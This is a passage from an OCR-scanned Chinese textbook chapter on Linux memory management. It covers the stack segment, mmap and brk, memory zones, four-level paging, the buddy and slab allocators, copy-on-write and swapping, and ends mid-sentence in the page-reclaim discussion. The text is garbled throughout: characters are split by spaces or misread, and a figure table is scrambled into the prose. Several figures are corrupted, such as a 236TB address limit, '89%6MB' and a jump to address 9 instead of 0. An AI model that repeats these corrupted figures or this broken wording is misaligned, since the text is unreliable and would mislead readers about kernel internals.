第 三 段 是 栈 段 。 在 大 多 数 机 器 里 ， 它 从 虚拟 地 址 空间 的 顶部 或 者 附近 开始 , 并 且 向 低地 址 空间 延伸 。 
例如 ， 在 32 位 x86 平 台 上 ， 栈 的 起 始 地 址 是 0xC0000000， 这 是 在 用 户 态 下 对 进程 可 见 的 3GB 虚 拟 地 址 限 
制 。 如 果 栈 生长 到 了 栈 段 的 底部 以 下 ， 就 会 产 出 一 个 硬件 错误 同时 操作 系统 把 栈 段 的 底部 降低 一 个 页 面 。 
程序 并 不 显 式 地 控制 栈 段 的 大 小 。 

当 一 个 程序 启动 的 时 候 ， 它 的 栈 并 不 是 空 的 。 相 反 ， 它 包含 了 所 有 的 环境 变量 以 及 为 了 调用 它 而 向 
shell 输 入 的 命令 行 。 这 样 ， 一 个 程序 就 可 以 发 现 它 的 参数 了 。 比 如 ， 当 输入 以 下 命令 


cp Src dest 


时 ，cp 程 序 运行 ， 并 且 栈 上 有 字符 串 “cp src dest"， 这 样 程序 就 可 以 找到 源 文件 和 目标 文件 的 名 字 。 这 
些 字符 串 被 表示 为 一 个 指针 数组 来 指向 字符 串 中 的 符号 ， 使 得 解析 更 加 容易 。 

当 两 个 用 户 运行 同样 的 程序 ， 比 如 编辑 器 ， 可 以 在 内 存 中 立刻 保持 该 编辑 器 程序 代码 的 两 个 副本 ， 
但 是 并 不 高 效 。 相 反 地 ， 大 多 数 Linux 系 统 支 持 共 享 代码 段 。 在 图 10-12a 和 图 10-12c 中 ， 可 以 看 到 两 个 进 
程 A 和 B 拥 有 相同 的 代码 段 。 在 图 10-12b 中 可 以 看 到 物理 内 存 的 一 种 可 能 布局 ， 其 中 两 个 进程 共享 了 同 
样 的 代码 片段 。 这 种 映射 是 通过 虚拟 内 存 硬 件 来 实现 的 。 

数据 段 和 栈 段 从 来 不 共享 ， 除 非 是 同一 个 父 进程 下 的 子 进程 ， 并 且 仅 仅 是 那些 没有 被 修改 的 页 面 。 
如 果 二 者 之 一 要 增长 但 是 没有 邻近 的 空间 来 增长 ， 这 并 不 会 产生 问题 ， 因 为 在 虚拟 地 址 空间 中 邻近 的 页 
面 并 不 一 定 要 映射 到 邻近 的 物理 页 面 上 。 

在 有 些 计 算 机 上 ， 硬 件 支持 指令 和 数据 拥有 不 同 的 地 址 空间 。 如 果 有 这 个 特性 ，Linux 就 可 以 利用 
它 。 例 如 ， 在 一 个 32 位 地 址 的 计算 机 上 如 果 有 这 个 特性 ， 那 么 就 有 2” 字 节 的 指令 地 址 空间 和 2” 字 节 的 数 
据 地 址 空间 。 一 条 跳 转 到 地 址 0 的 指令 跳 入 到 代码 段 的 地 址 9， 而 一 条 从 地 址 0 取 数 据 的 move 指 令 使 用 数 
据 空间 的 地 址 0。 这 使 得 可 用 的 数据 空间 加 倍 。 

除了 动态 分 配 更 多 的 内 存 ，Linux 中 的 进程 可 以 通过 内 存 映 射 文件 来 访问 文件 数据 。 这 个 特性 使 我 
们 可 以 把 一 个 文件 映射 到 进程 空间 的 一 部 分 而 该 文件 就 可 以 像 位 于 内 存 中 的 字 节 数组 一 样 被 读 写 。 把 一 
个 文件 映射 进来 使 得 随机 读 写 比 使 用 read 和 write 之 类 的 IO 系统 调用 要 容易 得 多 。 共 享 库 的 访问 就 是 用 
这 种 机 制 映射 进来 后 进行 的 。 在 图 10-13 中 ， 我 们 可 以 看 到 一 个 文件 被 同时 映射 到 两 个 进程 中 ， 但 在 不 
同 的 虚拟 地 址 上 。 
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图 10-13 两 个 进程 可 以 共享 一 个 映射 文件 
把 一 个 文件 映射 进来 的 一 个 附加 的 好 处 是 两 个 或 者 更 多 的 进程 可 以 同时 映射 相同 的 文件 。 其 中 一 个 
进程 对 文件 的 写 可 以 被 其 他 进程 马上 看 到 。 实 际 上 ， 通 过 映射 一 个 临时 文件 (所 有 的 进程 退出 之 后 就 被 
丢弃 )， 这 种 机 制 可 以 为 多 进程 共享 内 存 提供 高 带宽 。 在 最 极限 的 情况 下 ， 两 个 (或 者 更 多 ) 进程 可 以 
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映射 一 个 文件 覆盖 整个 地 址 空间 ， 从 而 提供 了 一 种 不 同 进程 之 间 和 线程 之 间 的 共享 方式 。 这 样 地 址 空间 
是 共享 的 (类 似 于 线程 )， 但 是 每 个 进程 维护 其 自身 的 打开 文件 和 信号 ， 这 些 不 同 于 线程 。 实 际 上 ， 从 
来 没有 两 个 完全 相同 的 地 址 空间 。 
10.4.2 Linux 中 的 内 存 管理 系统 调用 

POSIX 没 有 给 内 存 管 理 指定 任何 系统 调用 。 这 个 主题 被 认为 是 太 依赖 于 机 器 而 不 便于 标准 化 。 可 是 ， 
这 个 问题 通过 这 样 的 说 法 被 隐藏 起 来 了 : 那些 需要 动态 内 存 管理 的 程序 可 以 使 用 malloc 库 函数 (由 ANSI 
C 标 准 定义 )。 那 么 malloc 是 如 何 实现 的 就 被 推 到 了 POSIX 标 准 之 外 了 。 在 一 些 圈子 里 ， 这 种 方法 被 认为 
是 推卸 责任 。 























实际 土 ， 许 多 Linux 系 统 有 管理 系统 调用 描 述 
内 存 的 系统 调用 。 最 常见 的 列 在 了 | =? eddy 改变 数据 段 大 小 
图 10-14 中 。brk 通 过 给 出 数据 段 之 外 a=mmap (addr,len,prot,flags,fd offset) 映射 文件 
的 第 一 个 字 节 地 址 来 指定 数据 段 的 “SomeP Us 取消 映射 文件 | 
大 小 。 如 果 新 值 比 原来 的 要 大 ， 那 “图 10-14 跟 内 存 管理 相关 的 一 些 系统 调用 。 若 遇 到 错误 则 返回 码 s 
么 数据 段 变 大 ， 反 之 ， 数 据 段 缩减 。 为 1，a 和 addr 是 内 存 地 址 ，len 是 长 度 ，prot 是 控制 保护 ， 
mmap 和 munmap 系 统 调用 控 flags 是 混杂 位 串 ，fd 是 文件 描述 符 ，offset 是 文件 偏 移 


制 内 存 映射 文件 。mmap 的 第 一 个 
参数 ，addr， 决 定 文件 被 映射 的 地 址 。 它 必须 是 页 大 小 的 倍数 。 如 果 这 个 参数 是 0， 系 统 确定 地 址 并 且 
返回 到 a 中 。 第 二 个 参数 len 指 示 要 映射 的 字 节 数 。 它 也 必须 是 页 大 小 的 整数 倍 。 第 三 个 参数 prot 确 定 对 
映射 文件 的 保护 。 它 可 以 标记 为 可 读 、 可 写 、 可 执行 或 者 三 者 的 组 合 。 第 四 个 参数 ，flags， 控 制 文件 是 
私有 的 还 是 共享 的 以 及 addr 是 一 个 需求 还 是 仅仅 是 一 个 提示 。 第 五 个 参数 fd 是 要 映射 的 文件 的 描述 符 。 
只 有 打开 的 文件 是 可 以 被 映射 的 ， 因 此 为 了 映射 一 个 文件 ， 首 先 必须 要 打开 它 。 最 后 ，offset 指 示 从 文 
件 中 的 什么 位 置 开始 映射 。 并 不 一 定 要 从 第 0 个 字 节 开始 映射 ， 任 何 页 面 边界 都 是 可 以 的 。 

另 一 个 调用 ，unmap， 移 除 一 个 被 映射 的 文件 。 如 果 仅仅 是 文件 的 一 部 分 撤销 映射 ， 那么 其 他 部 分 
仍然 保持 映射 。 


10.4.3 Linux 中 内 存 管理 的 实现 

32 位 机 器 上 的 每 个 Linux 进 程 通常 有 3GB 的 虚拟 地 址 空间 ， 还 有 1GB 留 给 其 页 表 和 其 他 内 核 数 据 。 在 
用 户 态 下 运行 时 ， 内 核 的 1GB 是 不 可 见 的 ， 但 是 当 进 程 陷 入 到 内 核 时 是 可 以 访问 的 。 内 核 内 存 通常 驻 留 
在 低 端 物理 内 存 中 ， 但 是 被 映射 到 每 个 进程 虚拟 地 址 空间 顶部 的 1GB 中 ， 在 地 址 0xC0000000 和 
OxFFFFFFFF (3~4GB) 之 间 。 在 目前 的 64 位 x86 机 器 上 ， 最 多 只 有 48 位 用 于 寻 址 ， 这 意味 着 寻 址 存储 
器 的 大 小 的 理论 极限 值 为 236TB。Linux 区 分 内 核 和 用 户 空间 之 间 的 内 存 ， 从 而 导致 每 个 进程 最 大 的 虚拟 
地 址 空间 为 128TB。 当 进程 创建 的 时 候 ， 进 程 地 址 空间 被 创建 ， 并 且 当 发 生 一 个 exec 系 统 调用 时 被 重 写 。 

为 了 允许 多 个 进程 共享 物理 内 存 ，Linux 监 视 物理 内 存 的 使 用 ， 在 用 户 进程 或 者 内 核 构件 需要 时 分 
配 更 多 的 内 存 ， 把 物理 内 存 动态 映射 到 不 同 进程 的 地 址 空间 中 去 ， 把 程序 的 可 执行 体 、 文 件 和 其 他 状态 
信息 移 人 移出 内 存 来 高 效 地 利用 平台 资源 并 且 保 障 程序 执行 的 进展 性 。 本 章 的 剩余 部 分 描述 了 在 Linux 
内 核 中 负责 这 些 操作 的 各 种 机 制 的 实现 。 

1. 物理 内 存 管理 

在 许多 系统 中 由 于 异 构 硬 件 限 制 ， 并 不 是 所 有 的 物理 内 存 都 能 被 相同 地 对 待 ， 尤 其 是 对 于 I/O 和 虚 
拟 内 存 。Linux 区 分 以 下 内 存 区 域 (zone): 

1) ZONE_DMA 和 ZONE_DMA32: 可 以 用 于 DMA 操 作 的 页 。 

2) ZONE_NORMAL : 正常 的 ， 规 则 映射 的 页 。 

3) ZONE_HIGHMEM: 高 内 存 地 址 的 页 ， 并 不 永久 性 映射 。 

内 存 区 域 的 确切 边界 和 布局 是 硬件 体系 结构 相关 的 。 在 x86 硬 件 上 ， 一 些 设备 只 能 在 最 低 的 16MB 地 
址 空间 进行 DMA 操 作 ， 因 此 ZONE_DMA 就 在 0 ~~16MB 的 范围 内 。64 位 机 上 对 能 够 执行 32 位 DMA 操 作 
的 设备 提供 了 额外 的 支持 ， 那 么 ZONE DMA32 需 要 标记 这 一 区 域 。 此 外 ，i386 等 老 一 代 的 硬件 不 能 直接 
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映射 89%6MB 以 上 的 内 存 地 址 ， 那 么 ZONE_HIGHMEM 就 应 该 高 于 该 标记 的 任何 地 址 。ZONE_NORMAL 
是 介 于 其 中 的 任何 地 址 。 因 此 在 32 位 x86 平 台 上 ，Linux 地 址 空间 的 起 始 896MB 是 直接 映射 的 ， 而 内 核 地 
址 空间 的 剩余 128MB 是 用 来 访问 高 地 址 内 存 区 域 的 。20NE_HIGHMEN 在 x86_64 没 有 定义 内 核 为 每 个 内 
存 区 域 维护 一 个 zone 数据 结构 ， 并 且 可 以 分 别 在 三 个 区 域 上 执行 内 存 分 配 。 

Linux 的 内 存 由 三 部 分 组 成 。 前 两 部 分 是 内 核 和 内 存 映射 ， 被 固定 在 内 存 中 〈 页 面 从 来 不 换 出 )。 内 
存 的 其 他 部 分 被 划分 成 页 框 ， 每 一 个 页 框 都 可 以 包含 一 个 代码 、 数 据 或 者 栈 页 面 ， 一 个 页 表 页 面 ， 或 者 
在 空闲 列表 中 。 

内 核 维护 内 存 的 一 个 映射 ， 该 映射 包含 了 所 有 系统 物理 内 存 使 用 情况 的 信息 ， 比 如 区 域 、 空 闲 页 杠 
等 。 如 图 10-15， 这 些 信 息 是 如 下 组 织 的 。 

,首先 ，Linux 维 护 一 个 页 描述 符 数组 ， 称 为 mem_map， 其 中 页 描述 符 是 page 类 型 的 ， 而 且 系统 当中 
的 每 个 物理 页 框 都 有 一 个 页 描述 符 。 每 个 页 描述 符 都 有 个 指针 ， 在 页 面 非 空闲 时 指向 它 所 属 的 地 址 空间 ， 
另 有 一 对 指针 可 以 使 得 它 跟 其 他 描述 符 形成 双向 链表 ， 来 记录 所 有 的 空闲 页 框 和 一 些 其 他 的 域 。 在 图 
10-15 中 ， 页 面 150 的 页 描述 符 包含 一 个 到 其 所 属地 址 空间 的 上 映射。 页面 70、 页 面 80、 页 面 200 是 空闲 的 ， 
它们 是 被 链接 在 一 起 的 。 页 描述 符 的 大 小 是 32 字 节 ， 因 此 整个 mem_map 消 耗 了 不 到 1% 的 物理 内 存 (对 
于 4KB 的 页 框 )。 

因为 物理 内 存 被 分 成 区 域 ， 所 以 Linux 为 每 个 区 域 维护 一 个 区 域 描述 符 。 区 域 描述 符 包含 了 每 个 区 
域 中 内 存 利 用 情况 的 信息 ， 例 如 活动 和 非 活 动 页 的 数目 ， 页 面 置 换算 法 (本章 后 面 介绍 ) 所 使 用 的 高 低 
水 印 位 ， 还 有 许多 其 他 相关 信息 等 。 

此 外 ， 区 域 描述 符 包 含 一 个 空 帮 区 数组 。 该 数组 中 的 第 i 个 元 素 标记 了 2' 个 空 闪 页 的 第 一 个 块 的 第 一 个 
页 描述 符 。 既 然 可 能 有 多 块 2 个 空间 页 ，Linux 使 用 页 描述 符 的 指针 对 把 这 些 页 面 链 接 起 来 。 这 个 信息 在 
Linux 的 内 存 分 配 操作 中 使 用 。 在 图 10-15 中 ，free_area[0] 标 记 所 有 仅 由 一 个 页 框 组 成 的 物理 内 存 空 闲 区 ， 
现在 指向 页 面 70， 三 个 空闲 区 当中 的 第 一 个 。 其 他 大 小 为 一 个 页 面 的 空闲 块 也 可 通过 页 描述 符 中 的 链接 来 
获取 其 地 址 。 


mem_map: 页 描述 符 数组 


free_area[1] 


free_area[10] 





图 10-15 Linux 内 存 表 示 
最 后 ， 由 于 Linux 可 以 移植 到 NUMA 体 系 结构 (不同 的 内 存 地 址 有 不 同 的 访问 时 间 )，Linux 使 用 节 
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点 描述 符 来 区 分 不 同 节点 上 的 物理 内 存 TBR SSD BC TEE HY) BEAST HR FONE 
用 的 信息 和 这 个 特定 节点 的 区 域 信 息 。 在 UMA 平 台 上 ，Linux 用 一 个 节点 描述 符 记录 所 有 的 内 存 的 使 用 
情况 。 每 个 页 描述 符 的 最 初 一 些 位 是 用 来 指定 该 页 框 所 属 的 节点 和 区 域 的 。 

为 了 使 分 页 机 制 在 32 位 和 64 位 体系 结构 下 都 能 高 效 工作 ，Linux 采 用 了 一 个 四 级 分 页 策略 。 这 是 一 
种 最 初 在 Alpha 系 统 中 使 用 的 三 级 分 页 策略 ， 在 Linux 2.6.10 之 后 加 以 扩展 ， 并 且 从 2.6.11 版 本 以 后 使 用 
的 一 个 四 级 分 页 策略 。 每 个 虚拟 地 址 划分 成 五 个 域 ， 如 图 10-16。 目 录 域 是 页 目录 的 索引 ， 每 个 进程 都 
有 一 个 私有 的 页 目录 。 找 到 的 值 是 指向 其 中 一 个 下 一 级 目录 的 一 个 指针 ， 该 目录 也 可 以 从 虚拟 地 址 进行 
索引 。 中 级 页 目录 表 中 的 表 项 指向 最 终 的 页 表 ， 它 是 由 虚拟 地 址 的 页 表 域 索引 的 。 页 表 的 表 项 指向 所 需 
要 的 页 面 。 在 Pentium 处 理 器 (使 用 两 级 分 页 ) 上 ， 每 个 页 的 上 级 和 中 级 目录 仅 有 一 个 表 项 ， 因 此 总 目 
录 项 就 可 以 有 效 地 选择 要 使 用 的 页 表 。 类 似 地 ， 在 需要 的 时 候 可 以 使 用 三 级 分 页 ， 此 时 把 上 级 目录 域 的 
大 小 设置 为 0 就 可 以 了 。 


上 级 页 目录 
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图 10-16 Linux 使 用 四 级 页 表 


物理 内 存 可 以 用 于 多 种 目的 。 内 核 自 身 是 完全 “ 硬 连 线 ” 的 ， 它 的 任何 一 部 分 都 不 会 换 出 。 内 存 的 
其 余部 分 可 以 作为 用 户 页 面 、 分 页 缓存 和 其 他 目的 。 页 面 缓存 保存 最 近 已 读 的 或 者 由 于 未 来 有 可 能 使 用 
而 预 读 的 文件 块 ， 或 者 需要 写 回 磁盘 的 文件 块 页 面 ， 例 如 那些 被 换 出 到 磁盘 的 用 户 进程 创建 的 页 面 。 用 
户 进行 操作 时 随时 变化 的 页 面 共 同 竞争 页 面 缓存 这 个 有 限 的 空间 。 分 页 缓存 并 不 是 一 个 独立 的 缓存 ， 而 
是 那些 不 再 需要 的 或 者 等 待 换 出 的 用 户 页 面 集合 。 如 果 分 页 缓存 当中 的 一 个 页 面 在 被 换 出 内 存 之 前 复 用 ， 
它 可 以 被 快速 收回 。 

此 外 ，Linux 支 持 动 态 加 载 模块 ， 最 常见 的 是 设备 驱动 。 它 们 可 以 是 任意 大 小 的 并 且 必 须 被 分 配 一 
片 连续 的 内 核 内 存 。 这 些 需求 的 一 个 直接 结果 是 ，Linux 用 这 样 一 种 方式 来 管理 物理 内 存 使 得 它 可 以 随 
意 分 配 任意 大 小 的 内 存 片 。 它 使 用 的 算法 就 是 伙伴 算法 ， 下 面 给 予 描述 。 

2. 内 存 分 配 机 制 

Linux 支 持 多 种 内 存 分 配 机 制 。 分 配 物 理 内 存 页 框 的 主要 机 制 是 页 面 分 配器 ， 它 使 用 了 著名 的 伙伴 算法 。 

管理 一 块 内 存 的 基本 思想 如 下 。 刚 开始 ， 内 存 由 一 块 连续 的 片段 组 成 ， 图 10-17a 的 简单 例子 中 是 64 
个 页 面 。 当 一 个 内 存 请 求 到 达 时 ， 首 先 上 伟人 到 2 的 祖 ， 比 如 8 个 页 面 。 然 后 整个 内 存 块 被 分 割 成 两 半 ， 
如 图 b 所 示 。 因 为 这 些 片 段 还 是 太 大 了 ， 较 低 的 片段 被 再 次 二 分 (c) ， 然 后 再 二 分 (d) 。 现 在 我 们 有 一 
块 大 小 合适 的 内 存 ， 因 此 把 它 分 配给 请 求 者 ， 如 图 d 所 示 。 

现在 假定 8 个 页 面 的 第 二 个 请 求 到 达 了 。 这 个 请 求 有 (e) 直接 满足 了 。 此 时 需要 4 个 页 面 的 第 三 个 
请 求 到 达 了 。 最 小 可 用 的 块 被 分 割 (f) ， 然 后 其 一 半 被 分 配 〈g)。 接 下 来 ，8 页 面 的 第 二 个 块 被 释放 (h)。 
最 后 ，8 页 面 的 另 一 个 块 也 被 释放 。 因 为 刚刚 释放 的 两 个 邻接 的 8 页 面 块 来 自 同 一 个 16 页 面 块 ， 它 们 合并 
起 来 得 到 一 个 16 页 面 的 块 (i)。 
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图 10-17 伙伴 算法 的 操作 


Linux 用 伙伴 算法 管理 内 存 ， 同 时 有 一 些 附 加 特性 。 它 有 个 数组 ， 其 中 的 第 一 个 元 素 是 大 小 为 1 个 单 
位 的 内 存 块 列 表 的 头 部 ， 第 二 个 元 素 是 大 小 为 2 个 单位 的 内 存 块 列表 的 头 部 ， 下 一 个 是 大 小 为 4 个 单位 的 
内 存 块 列表 的 头 部 ， 以 此 类 推 。 通 过 这 种 方法 ， 任 何 2 的 寡 次 大 小 的 块 都 可 以 快速 找到 。 

这 个 算法 导致 了 大 量 的 内 部 碎片 ， 因 为 如 果 想 要 65 页 面 的 块 ， 必 须要 请 求 并 且 得 到 一 个 128 页 面 
的 块 。 

为 了 缓解 这 个 问题 ，Linux 有 另 一 个 内 存 分 配器 ，slab 分 配器 。 它 使 用 伙伴 算法 获得 内 存 块 ， 但 是 
之 后 从 其 中 切 出 slab (更 小 的 单元 ) 并 且 分 别 进行 管理 。 

因为 内 核 频繁 地 创建 和 撤销 一 定 类 型 的 对 象 (如 task_struct) ， 它 使 用 了 对 象 缓存 。 这 些 缓存 由 指向 
一 个 或 多 个 slab 的 指针 组 成 ， 而 slab 可 以 存储 大 量 相 同类 型 的 对 象 。 每 个 slab 要 么 是 满 的 ， 要 么 是 部 分 满 
的 ， 要 么 是 空 的 。 

例如 ， 当 内 核 需 要 分 配 一 个 新 的 进程 描述 符 〈 一 个 新 的 task_struct) 的 时 候 ， 它 在 task 结 构 的 对 象 
缓存 中 寻找 ， 首 先 试图 找 一 个 部 分 满 的 slab 并 且 在 那里 分 配 一 个 新 的 task_struct 对 象 。 如 果 没 有 这 样 的 
slab 可 用 ， 就 在 空闲 slab 列 表 中 查找 。 最 后 ， 如 果 必 要 ， 它 会 分 配 一 个 新 的 slab ， 把 新 的 task 结 构 放 在 那 
里 ， 同 时 把 该 slab 连 接 到 task 结 构 对 象 缓 存 中 。 在 内 核 地 址 空间 分 配 连续 的 内 存 区 域 的 kmalloc 内 核 服务 ， 
实际 上 就 是 建立 在 slab 和 对 象 缓存 接口 之 上 的 。 

第 三 个 内 存 分 配器 vmalloc 也 是 可 用 的 ， 并 且 用 于 那些 仅仅 需要 连续 虚拟 地 址 空间 的 请 求 ， 在 物理 
内 存 中 它 并 不 适用 。 实 际 上 ， 这 一 点 对 于 大 部 分 内 存 分 配 是 成 立 的 。 一 个 例外 是 设备 ， 它 位 于 内 存 总 线 
和 内 存 管理 单元 的 另 一 端 ， 因 此 并 不 理解 虚拟 地 址 。 然 而 ， 由 于 vmalloc 的 使 用 导致 一 些 性 能 的 损失 ， 
因此 它 主要 被 用 于 分 配 大 量 连续 虚拟 地 址 空间 ， 例 如 动态 插入 内 核 模块 。 所 有 这 些 内 存 分 配器 都 是 继承 
自 System V 中 的 那些 分 配器 。 

3. 虚拟 地 址 空间 表示 

虚拟 地 址 空间 被 分 割 成 同 构 连续 页 面 对 齐 的 区 域 。 也 就 是 说 ， 每 个 区 域 由 一 系列 连续 的 具有 相同 保 
护 和 分 页 属性 的 页 面 组 成 。 代 码 段 和 映射 文件 就 是 区 (area) 的 例子 ( 见 图 10-15)。 在 虚拟 地 址 空间 的 
区 之 间 可 以 有 空 阶 。 所 有 对 这 些 空隙 的 引用 都 会 导致 一 个 严重 的 页 面 故障 。 页 大 小 是 确定 的 ， 例 如 
Pentium 是 4KB 而 Alpha 是 8KB。 加 入 4MB 页 框 的 支持 是 从 Pentium 开 始 的 。 在 最 近 的 64 位 结构 中 ，Linux 
可 以 支持 4MB 的 大 页 框 。 而 且 ， 在 PAE (物理 地 址 扩展 ) 模式 下 ，2MB 的 页 大 小 是 支持 的 。 在 一 些 32 位 
机 器 上 常用 PAE 来 增加 进程 地 址 空间 ， 使 之 超过 4GB 。 

在 内 核 中 ， 每 个 区 是 用 vm_area_struct 项 来 描述 的 。 一 个 进程 的 所 有 vm_area_struct 用 一 个 链表 链接 
在 一 起 ， 并 且 按 照 虚拟 地 址 排序 以 便 可 以 找到 所 有 的 页 面 。 当 这 个 链表 太 长 时 (多 于 32 项 ) ， 就 创建 一 
个 树 来 加 速 搜索 。vm_area_struct 项 列 出 了 该 区 的 属性 。 这 些 属性 包括 : 保护 模式 (如 ， 只 读 或 者 可 读 
可 写 ) 、 是 否 固定 在 内 存 中 (不 可 换 出 ) 、 朝 向 哪个 方向 生长 (数据 段 向 上 长 ， 栈 段 向 下 长 ) 。 

vm_area_struct 也 记录 该 区 是 私有 的 还 是 跟 一 个 或 多 个 其 他 进程 共享 的 。fork 之 后 ，Linux 为 子 进程 
复制 一 份 区 链表 ， 但 是 让 父子 进程 指向 相同 的 页 表 。 区 被 标记 为 可 读 / 可 写 ， 但 是 页 面 自己 却 被 标记 为 
只 读 。 如 果 任 何 一 个 进程 试图 写 页 面 ， 就 会 产生 一 个 保护 故障 ， 此 时 内 核发 现 该 内 存 区 逻辑 上 是 可 写 的 ， 
但 是 页 面 却 不 是 可 写 入 的 ， 因 此 它 把 该 页 面 的 一 个 副本 给 当前 进程 同时 标记 为 可 读 可 写 。 这 个 机 制 就 说 
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明了 写 时 复制 是 如 何 实现 的 。 

vm_area_struct 也 记录 该 区 是 否 在 磁盘 上 有 备份 存储 ， 如 果 有 ， 在 什么 地 方 。 代 码 段 把 可 执行 二 进 
制 文 件 作 为 备份 存储 ， 内 存 映 射 文件 把 磁盘 文件 作为 备份 存储 。 其 他 区 ， 如 栈 ， 直 到 它们 不 得 不 被 换 出 ， 
否则 没有 备份 存储 被 分 配 。 

一 个 顶层 内 存 描述 符 mm_struct 收 集 属于 一 个 地 址 空间 的 所 有 虚拟 内 存 区 相关 的 信息 ， 还 有 关于 不 
同 段 (代码 ， 数 据 ， 栈 ) 和 用 户 共享 地 址 空间 的 信息 等 。 一 个 地 址 空间 的 所 有 vm_area_struct 元 素 可 以 
通过 内 存 描述 符 用 两 种 方式 访问 。 首 先 ， 它 们 是 按照 虚拟 地 址 顺序 组 织 在 链表 中 的 。 这 种 方式 的 有 用 之 
处 是 : 当 所 有 的 虚拟 地 址 区 需要 被 访问 时 ， 或 者 当 内 核查 找 分 配 一 个 指定 大 小 的 虚拟 内 存 区 域 时 。 此 外 ， 
vm_area_struct 项 目 被 组 织 成 二 又 “ 红 黑 ” 树 (一 种 为 了 快速 查找 而 优化 的 数据 结构 )。 这 种 方法 用 于 访 
问 一 个 指定 的 虚拟 内 存 地 址 。 为 了 能 够 用 这 两 种 方法 访问 进程 地 址 空间 的 元 素 ，Linux 为 每 个 进程 使 用 
了 更 多 的 状态 ,但 是 却 允 许 不 同 的 内 核 操作 来 使 用 这 些 访问 方法 ， 这 对 进程 而 言 更 加 高 效 。 


10.4.4 Linux 中 的 分 页 

早期 的 UNIX 系 统 ， 每 当 所 有 的 活动 进程 不 能 容纳 在 物理 内 存 中 时 就 用 一 个 交换 进程 在 内 存 和 磁盘 
之 间 移 动 整个 进程 。Linux 跟 其 他 现代 UNIX 版 本 一 样 ， 不 再 移动 整个 进程 了 。 内 存 管理 单元 是 一 个 页 ， 
并 且 几 乎 所 有 的 内 存 管理 部 件 以 页 为 操作 粒度 。 交 换 子 系统 也 是 以 页 为 操作 粒度 的 ， 并 且 跟 页 框 回收 算 
法 紧 耦 合 在 一 起 。 这 个 后 面 会 给 予 描述 。 

Linux 分 页 背后 的 基本 思想 是 简单 的 : 为 了 运行 ， 一 个 进程 并 不 需要 完全 在 内 存 中 。 实 际 上 所 需要 
的 是 用 户 结构 和 页 表 。 如 果 这 些 被 换 进 内 存 ， 那 么 进程 被 认为 是 “在 内 存 中 ”， 可 以 被 调度 运行 了 。 代 
码 、 数 据 和 栈 段 的 页 面 是 动态 载 入 的， 仅仅 是 在 它们 被 引用 的 时 候 。 如 果 用 户 结 构 和 页 表 不 在 内 存 中 ， 
直到 交换 器 把 它们 载 入 内存 进程 才能 运行 。 l 

分 页 是 一 部 分 由 内 核实 现 而 一 部 分 由 一 个 新 的 进程 一 一 页 面 守 护 进 程 实现 的 。 页 面 守 护 进程 是 进程 
2 (进程 0 是 idle 进 程 ， 传 统 上 称 为 交换 器 ， 而 进程 1 是 init， 如 图 10-11 所 示 )。 跟 所 有 守护 进程 一 样 ， 页 
面 守护 进程 周期 性 地 运行 。 一 旦 唤醒 ， 它 主动 查找 是 否 有 工作 要 干 。 如 果 它 发 现 空闲 页 面 数量 太 少 ， 就 
开始 释放 更 多 的 页 面 。 

Linux 是 一 个 请 求 换 页 系统 ， 没 有 预 分 页 和 工作 集 的 概念 (不 过 存在 一 个 系统 调用 ， 其 中 用 户 可 以 给 
系统 一 个 提示 将 要 使 用 某 个 页 面 ， 希 望 需要 的 时 候 页 面 在 内 存 中 )。 代 码 段 和 映射 文件 换 页 到 它们 各 自在 
磁盘 上 的 文件 中 。 所 有 其 他 的 都 被 换 页 到 分 页 分 区 (如果 存 在 ) 或 者 一 个 固定 长 度 的 分 页 文件 ， 叫 作 交换 
区 。 分 页 文件 可 以 被 动态 地 添加 或 者 删除 ， 并 且 每 个 都 有 一 个 优先 级 。 换 页 到 一 个 独立 的 分 区 并 且 像 一 个 
原始 设备 那样 访问 的 这 种 方式 要 比 换 页 到 一 个 文件 的 方式 更 加 高 效 。 之 所 以 这 么 说 是 有 多 重 原因 的 : 首先 ， 
文件 块 和 磁盘 块 的 映射 不 需要 了 (节省 了 磁盘 IO 读 间 接 块 ) ， 其次， 物理 写 可 以 是 任意 大 小 的 ， 并 不 仅仅 
是 文件 块 大 小 ， 第 三 ， 一 个 页 总 是 被 连续 地 写 到 磁盘 ， 用 一 个 分 页 文件 ， 就 并 一 定 是 这 样 。 

页 面具 有 在 需要 的 时 候 才 在 分 页 设备 或 者 分 区 上 被 分 配 。 每 个 设备 和 文件 由 一 个 位 图 开始 说 明 哪 些 
页 面 是 空闲 的 。 当 一 个 没有 备份 存储 的 页 面 必须 换 出 的 时 候 ， 仍 有 空闲 空间 的 最 高 优先 级 的 分 页 分 区 或 
者 文件 被 选中 并 且 在 其 上 面 分 配 一 个 页 面 。 正 常情 况 下 ， 分 页 分 区 (车 存在 ) 拥有 比 任何 分 页 文件 更 高 
的 优先 级 。 页 表 被 及 时 更 新 以 反映 页 面 已 经 不 在 内 存 了 (如 ，page-not-present 位 被 设置 ) 同时 磁盘 位 置 
被 写 人 到 页 表 项 。 

页 面 置 换算 法 

页 面 替 换 是 这 样 工作 的 。Linux 试 图 保留 一 些 空闲 页 面 ， 这 样 可 以 在 需要 的 时 候 分 配 它 们 。 当 然 ， 
这 个 页 面 池 必须 不 断 地 加 以 补充 。PFRA (页 框 回收 算法 ) 算法 展示 了 它 是 如 何 发 生 的 。 

首先 ，Linux 区 分 四 种 不 同 的 页 面 : 不 可 回收 的 (unreclaimable) 、 可 交换 的 (swappable), 、 可 同步 
的 (syncable)、 可 丢弃 的 (discardable)。 不 可 回收 页 面包 括 保留 或 者 锁定 页 面 、 内 核 态 栈 等 ， 不 会 被 
换 出 。 可 交换 页 必须 在 回收 之 前 写 回 到 交换 区 或 者 分 页 磁盘 分 区 。 可 同步 的 页 面 如 果 被 标记 为 dirty 就 必 
须要 写 回 到 磁盘 。 最 后 ， 可 丢弃 的 页 面 可 以 被 立即 回收 。 

在 启动 的 时 候 ，init 开 启 一 个 页 面 守护 进程 kswapd (每 个 内 存 节点 都 有 一 个 ) ， 并 且 配 置 它们 能 周期 
性 运行 。 每 次 kswapd 被 唤醒 ， 它 通过 比较 每 个 内 存 区 域 的 高 低 水 位 和 当前 内 存 的 使 用 来 检查 是 否 有 足够 
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个 确定 数目 的 页 面 被 回收 ， 典 型 值 是 最 大 值 32。 这 个 值 是 受 限 的 ， 以 控制 JO 压 力 (由 PFRA 操 作 导 致 的 
磁盘 写 的 次 数 )。 回 收 页 面 的 数量 和 扫描 页 面 的 总 数量 都 是 可 配置 的 参数 。 . 

正如 人们 都 会 按照 先 易 后 难 的 顺序 做 事 一 样 ， 每 次 PFRA 执 行 时 ， 它 首先 回收 容易 的 页 面 ， 然 后 处 
